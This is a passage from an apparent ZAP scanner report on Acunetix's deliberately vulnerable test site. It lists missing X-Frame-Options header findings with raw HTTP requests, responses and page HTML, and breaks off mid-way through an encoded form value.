href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xv